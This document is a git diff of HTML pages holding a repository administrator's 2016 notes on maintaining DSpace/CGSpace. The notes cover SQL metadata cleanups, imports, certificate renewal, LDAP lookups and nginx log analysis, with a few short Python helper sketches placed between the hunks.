    # select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
    +
    # select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
     

    2016-05-20

    • More work on CCAFS Video and Images records
    • For SAFBuilder we need to modify filename column to have the thumbnail bundle:
    -
    value + "__bundle:THUMBNAIL"
    +
    value + "__bundle:THUMBNAIL"
     
    • Also, I fixed some weird characters using OpenRefine’s transform with the following GREL:
    -
    value.replace(/\u0081/,'')
    +
    value.replace(/\u0081/,'')
     
    • And then import to CGSpace:
    -
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &> /tmp/ccafs-images-may30.log
    +
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/70974 --source /tmp/ccafs-images --mapfile=/tmp/ccafs-images-may30.map &> /tmp/ccafs-images-may30.log
     
    • But now we have double authors for “CGIAR Research Program on Climate Change, Agriculture and Food Security” in the authority
    • I’m trying to do a Discovery index before messing with the authority index
    • @@ -322,12 +322,12 @@ $ /home/dspacetest.cgiar.org/bin/dspace export -t COLLECTION -i 10568/79355 -d ~
    • Run system updates on DSpace Test, re-deploy code, and reboot the server
    • Clean up and import ~200 CTA records to CGSpace via CSV like:
    -
    $ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
     $ /home/cgspace.cgiar.org/bin/dspace metadata-import -e aorth@mjanja.ch -f ~/CTA-May30/CTA-42229.csv &> ~/CTA-May30/CTA-42229.log
     
    • Discovery indexing took a few hours for some reason, and after that I started the index-authority script
    -
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace index-authority
    +
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace index-authority
     

    2016-05-31

    • The index-authority script ran overnight and was finished in the morning
    diff --git a/docs/2016-06/index.html b/docs/2016-06/index.html
    index f941e4199..8c132040d 100644
    --- a/docs/2016-06/index.html
    +++ b/docs/2016-06/index.html
    @@ -34,7 +34,7 @@ This is their publications set: http://ebrary.ifpri.org/oai/oai.php?verb=ListRec
     You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
     Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
     "/>
    -
    +
    @@ -129,7 +129,7 @@ Working on second phase of metadata migration, looks like this will work for mov
    • You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
    • Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
    -
    dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
    +
    dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like 'PN%' or text_value like 'PHASE%' or text_value = 'CBA' or text_value = 'IA');
     UPDATE 497
     dspacetest=# update metadatavalue set metadata_field_id=29 where metadata_field_id=75;
     UPDATE 14
    @@ -160,7 +160,7 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
     
  • So the only difference is the “confidence”
  • Ok, well THAT is interesting:
  • -
    dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
    +
    dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like '%Orth, %';
      text_value |              authority               | confidence
     ------------+--------------------------------------+------------
      Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
    @@ -180,13 +180,13 @@ CGIAR Research Program on Climate Change, Agriculture and Food Security::acd0076
     
    • And now an actually relevant example:
    -
    dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
    +
    dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence = 500;
      count
     -------
        707
     (1 row)
     
    -dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
    +dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
      count
     -------
        253
    @@ -194,7 +194,7 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and te
     
    • Trying something experimental:
    -
    dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
    +
    dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
     UPDATE 960
     
    -
    $ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
    +
    $ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
     
    • Write to Atmire about the use of atmire.orcid.id to see if we can change it
    • Seems to be a virtual field that is queried from the authority cache… hmm
    • @@ -263,9 +263,9 @@ UPDATE 960
    • It looks like the values are documented in Choices.java
    • Experiment with setting all 960 CCAFS author values to be 500:
    -
    dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
    +
    dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
     
    -dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
    +dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
     UPDATE 960
     
    • After the database edit, I did a full Discovery re-index
    • @@ -320,7 +320,7 @@ UPDATE 960
      • CGSpace’s HTTPS certificate expired last night and I didn’t notice, had to renew:
      -
      # /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook "/usr/bin/service nginx stop" --post-hook "/usr/bin/service nginx start"
      +
      # /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook "/usr/bin/service nginx stop" --post-hook "/usr/bin/service nginx start"
       
      • I really need to fix that cron job…
      @@ -328,8 +328,8 @@ UPDATE 960
      • Run the replacements/deletes for dc.description.sponsorship (investors) on CGSpace:
      -
      $ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
      -$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
      +
      $ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
      +$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
       
      • The scripts for this are here:
          @@ -367,9 +367,9 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
      • Run all cleanups and deletions of dc.contributor.corporate on CGSpace:
      -
      $ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
      -$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
      -$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
      +
      $ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
      +$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
      +$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
       
      • Re-deploy CGSpace and DSpace Test with latest June changes
      • Now the sharing and Altmetric bits are more prominent:
      • @@ -383,11 +383,11 @@ $ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-D
        • Wow, there are 95 authors in the database who have ‘,’ at the end of their name:
        -
        # select text_value from  metadatavalue where metadata_field_id=3 and text_value like '%,';
        +
        # select text_value from  metadatavalue where metadata_field_id=3 and text_value like '%,';
         
        • We need to use something like this to fix them, need to write a proper regex later:
        -
        # update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
        +
        # update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
         
        diff --git a/docs/2016-07/index.html b/docs/2016-07/index.html index 041966912..5577bcce7 100644 --- a/docs/2016-07/index.html +++ b/docs/2016-07/index.html @@ -44,7 +44,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and In this case the select query was showing 95 results before the update "/> - + @@ -135,9 +135,9 @@ In this case the select query was showing 95 results before the update
      • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
      • I think this query should find and replace all authors that have “,” at the end of their names:
      -
      dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
      +
      dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
       UPDATE 95
      -dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
      +dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
        text_value
       ------------
       (0 rows)
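
The trailing-comma cleanup above can also be tried outside the database before touching any rows. This is a minimal sketch, assuming the same pattern as the `regexp_replace` call; the sample names other than `Poole, J,` are made up for illustration, and `strip_trailing_comma` is a hypothetical helper, not part of any existing script.

```python
import re

# Same pattern as the SQL above: capture everything up to one final comma.
TRAILING_COMMA = re.compile(r'^(.+?),$')


def strip_trailing_comma(name: str) -> str:
    """Drop a single trailing comma; names without one are returned unchanged."""
    return TRAILING_COMMA.sub(r'\1', name)


if __name__ == '__main__':
    # 'Poole, J,' is from the notes; the other values are illustrative only.
    for name in ['Poole, J,', 'Orth, A.', 'Grace, D.,']:
        print(repr(name), '->', repr(strip_trailing_comma(name)))
```

Only one comma is removed per value, so a name ending in two commas would need a second pass.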
      @@ -158,7 +158,7 @@ dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and
       
    • We really only need statistics and authority but meh
    • Fix metadata for species on DSpace Test:
    -
    $ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
     
    • Will run later on CGSpace
    • A user is still having problems with Sherpa/Romeo causing crashes during the submission process when the journal is “ungraded”
    • @@ -169,7 +169,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
      • Delete 23 blank metadata values from CGSpace:
      -
      cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
      +
      cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
       DELETE 23
       
      • Complete phase three of metadata migration, for the following fields: @@ -188,9 +188,9 @@ DELETE 23
      • Also, run fixes and deletes for species and author affiliations (over 1000 corrections!)
      -
      $ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
      -$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
      -$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
      +
      $ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
      +$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
      +$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
       
      • I then ran all server updates and rebooted the server
      @@ -221,7 +221,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
      • I suspect it’s someone hitting REST too much:
      -
      # awk '{print $1}' /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
      +
      # awk '{print $1}' /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
           710 66.249.78.38
          1781 181.118.144.29
         24904 70.32.99.142
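
The `awk | sort | uniq -c` pipeline above could be approximated in Python when the counts need further processing. This is only a sketch: it assumes the client IP is the first whitespace-separated field of each log line (as `awk '{print $1}'` does), and the sample lines are invented, not taken from the real `rest.log`.

```python
from collections import Counter


def top_clients(log_lines, n=3):
    """Count requests per client IP (first field) and return the n busiest, highest first."""
    counts = Counter(line.split()[0] for line in log_lines if line.strip())
    return counts.most_common(n)


if __name__ == '__main__':
    # Invented sample lines; a real run would iterate over the open log file instead.
    sample = [
        '70.32.99.142 - - "GET /rest/items HTTP/1.1" 200',
        '70.32.99.142 - - "GET /rest/items HTTP/1.1" 200',
        '70.32.99.142 - - "GET /rest/items HTTP/1.1" 200',
        '181.118.144.29 - - "GET /rest/collections HTTP/1.1" 200',
        '181.118.144.29 - - "GET /rest/collections HTTP/1.1" 200',
        '66.249.78.38 - - "GET /rest/communities HTTP/1.1" 200',
    ]
    for ip, hits in top_clients(sample):
        print(f'{hits:7d} {ip}')
```

Unlike the shell pipeline, which lists the busiest client last, `most_common` returns it first.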
      diff --git a/docs/2016-08/index.html b/docs/2016-08/index.html
      index d2b0f5be6..8ee34ba3e 100644
      --- a/docs/2016-08/index.html
      +++ b/docs/2016-08/index.html
      @@ -42,7 +42,7 @@ $ git checkout -b 55new 5_x-prod
       $ git reset --hard ilri/5_x-prod
       $ git rebase -i dspace-5.5
       "/>
      -
      +
       
       
           
      @@ -166,7 +166,7 @@ $ git rebase -i dspace-5.5
       
    • Fix item display incorrectly displaying Species when Breeds were present (#260)
    • Experiment with fixing more authors, like Delia Grace:
    -
    dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
    +
    dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
     

    2016-08-06

    • Finally figured out how to remove “View/Open” and “Bitstreams” from the item view
    • @@ -184,8 +184,8 @@ $ git rebase -i dspace-5.5
    • Install latest Oracle Java 8 JDK
    • Create setenv.sh in Tomcat 8 libexec/bin directory:
    -
    CATALINA_OPTS="-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8"
    -CATALINA_OPTS="$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib"
    +
    CATALINA_OPTS="-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8"
    +CATALINA_OPTS="$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib"
     
     JRE_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_102.jdk/Contents/Home
     
      @@ -246,7 +246,7 @@ $ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/sol
    • Fix “CONGO,DR” country name in input-forms.xml (#264)
    • Also need to fix existing records using the incorrect form in the database:
    -
    dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
    +
    dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
     
    • I asked a question on the DSpace mailing list about updating “preferred” forms of author names from ORCID
    @@ -300,12 +300,12 @@ Database Driver: PostgreSQL Native Driver version PostgreSQL 9.1 JDBC4 (build 90
  • Talk to Atmire about the DSpace 5.5 issue, and it seems to be caused by a bug in FlywayDB
  • They said I should delete the Atmire migrations
  • -
    dspacetest=# delete from schema_version where description =  'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
    -dspacetest=# delete from schema_version where description =  'Atmire MQM migration' and version='5.1.2015.12.03.3';
    +
    dspacetest=# delete from schema_version where description =  'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
    +dspacetest=# delete from schema_version where description =  'Atmire MQM migration' and version='5.1.2015.12.03.3';
     
    • After that DSpace starts up, but XMLUI now has unrelated issues that I need to solve!
    -
    org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
    +
    org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
     context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
     
    • Looks like we’re missing some stuff in the XMLUI module’s sitemap.xmap, as well as in each of our XMLUI themes
    • @@ -324,13 +324,13 @@ context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
    • Clean up and import 48 CCAFS records into DSpace Test
    • SQL to get all journal titles from dc.source (55), since it’s apparently used for internal DSpace filename shit, but we moved all our journal titles there a few months ago:
    -
    dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
    +
    dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
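
The exclusion pattern in the query above is easy to get wrong, so it may help to test it against a few values first. This is a sketch that reuses the same regular expression with Python's `re.search`, which like PostgreSQL's `!~` matches anywhere in the string; the sample values and the `looks_like_journal_title` helper are hypothetical.

```python
import re

# Pattern copied from the SQL query above: file extensions plus the media filter class prefix.
NOT_A_TITLE = re.compile(
    r'.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?'
    r'|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd'
    r'|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*'
)


def looks_like_journal_title(value: str) -> bool:
    """True when the value does not match the filename pattern (the SQL `!~` test)."""
    return NOT_A_TITLE.search(value) is None


if __name__ == '__main__':
    # Illustrative values only, not real dc.source contents.
    for value in ['Agricultural Systems', 'report-2016.pdf', 'thumbnail.JPG']:
        print(value, '->', looks_like_journal_title(value))
```

Because the extensions are listed case by case, a variant such as `.Jpg` would still pass as a title; that matches the behaviour of the original query.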
     

    2016-08-25

    • Atmire suggested adding a missing bean to dspace/config/spring/api/atmire-cua.xml but it doesn’t help:
    ...
    -Error creating bean with name 'MetadataStorageInfoService'
    +Error creating bean with name 'MetadataStorageInfoService'
     ...
     
    • Atmire sent an updated version of dspace/config/spring/api/atmire-cua.xml and now XMLUI starts but gives a null pointer exception:
    • @@ -351,7 +351,7 @@ Error creating bean with name 'MetadataStorageInfoService'
    • Import the 47 CCAFS records to CGSpace, creating the SimpleArchiveFormat bundles and importing like:
    $ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
    -$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
    +$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
     
    • Finally got DSpace 5.5 working with the Atmire modules after a few rounds of back and forth with Atmire devs
    diff --git a/docs/2016-09/index.html b/docs/2016-09/index.html index 1cc0df08e..1caf406c8 100644 --- a/docs/2016-09/index.html +++ b/docs/2016-09/index.html @@ -14,7 +14,7 @@ Discuss how the migration of CGIAR’s Active Directory to a flat structure We had been using DC=ILRI to determine whether a user was ILRI or not It looks like we might be able to use OUs now, instead of DCs: -$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)" +$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)" " /> @@ -32,9 +32,9 @@ Discuss how the migration of CGIAR’s Active Directory to a flat structure We had been using DC=ILRI to determine whether a user was ILRI or not It looks like we might be able to use OUs now, instead of DCs: -$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)" +$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)" "/> - + @@ -127,7 +127,7 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=or
  • We had been using DC=ILRI to determine whether a user was ILRI or not
  • It looks like we might be able to use OUs now, instead of DCs:
  • -
    $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
    +
    $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
     
    • User who has been migrated to the root vs user still in the hierarchical structure:
    @@ -142,15 +142,15 @@ distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Eth
    $ dropdb dspacetest
     $ createdb -O dspacetest --encoding=UNICODE dspacetest
    -$ psql dspacetest -c 'alter user dspacetest createuser;'
    +$ psql dspacetest -c 'alter user dspacetest createuser;'
     $ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-09-01.backup
    -$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
    +$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
     $ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
     $ vacuumdb dspacetest
     
    • Some names that I thought I fixed in July seem not to be:
    -
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
    +
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
           text_value       |              authority               | confidence
     -----------------------+--------------------------------------+------------
      Poole, Elizabeth Jane | b6efa27f-8829-4b92-80fe-bc63e03e3ccb |        600
    @@ -163,12 +163,12 @@ $ vacuumdb dspacetest
     
    • At least a few of these actually have the correct ORCID, but I will unify the authority to be c3a22456-8d6a-41f9-bba0-de51ef564d45
    -
    dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
    +
    dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
     UPDATE 69
     
    • And for Peter Ballantyne:
    -
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
    +
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
         text_value     |              authority               | confidence
     -------------------+--------------------------------------+------------
      Ballantyne, Peter | 2dcbcc7b-47b0-4fd7-bef9-39d554494081 |        600
    @@ -180,26 +180,26 @@ UPDATE 69
     
    • Again, a few have the correct ORCID, but there should only be one authority…
    -
    dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
    +
    dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
     UPDATE 58
     
    • And for me:
    -
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
    +
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
      text_value |              authority               | confidence
     ------------+--------------------------------------+------------
      Orth, Alan | 4884def0-4d7e-4256-9dd4-018cd60a5871 |        600
      Orth, A.   | 4884def0-4d7e-4256-9dd4-018cd60a5871 |        600
      Orth, A.   | 1a1943a0-3f87-402f-9afe-e52fb46a513e |        600
     (3 rows)
    -dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
    +dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
     UPDATE 11
     
    • And for CCAFS author Bruce Campbell that I had discussed with CCAFS earlier this week:
    -
    dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
    +
    dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
     UPDATE 166
    -dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
    +dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
            text_value       |              authority               | confidence
     ------------------------+--------------------------------------+------------
      Campbell, Bruce        | 0e414b4c-4671-4a23-b570-6077aca647d8 |        600
    @@ -215,18 +215,18 @@ dspacetest=# select distinct text_value, authority, confidence from metadatavalu
     
    • After one week of logging TLS connections on CGSpace:
    -
    # zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
    +
    # zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
     217
     # zcat -f -- /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
     1164376
    -# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
    +# zgrep "DES-CBC3" /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
     TLSv1/DES-CBC3-SHA
     TLSv1/EDH-RSA-DES-CBC3-SHA
     
    • So this represents 0.02% of 1.16M connections over a one-week period
    • Transforming some filenames in OpenRefine so they can have a useful description for SAFBuilder:
    -
    value + "__description:" + cells["dc.type"].value
    +
    value + "__description:" + cells["dc.type"].value
     
    • This gives you, for example: Mainstreaming gender in agricultural R&D.pdf__description:Brief
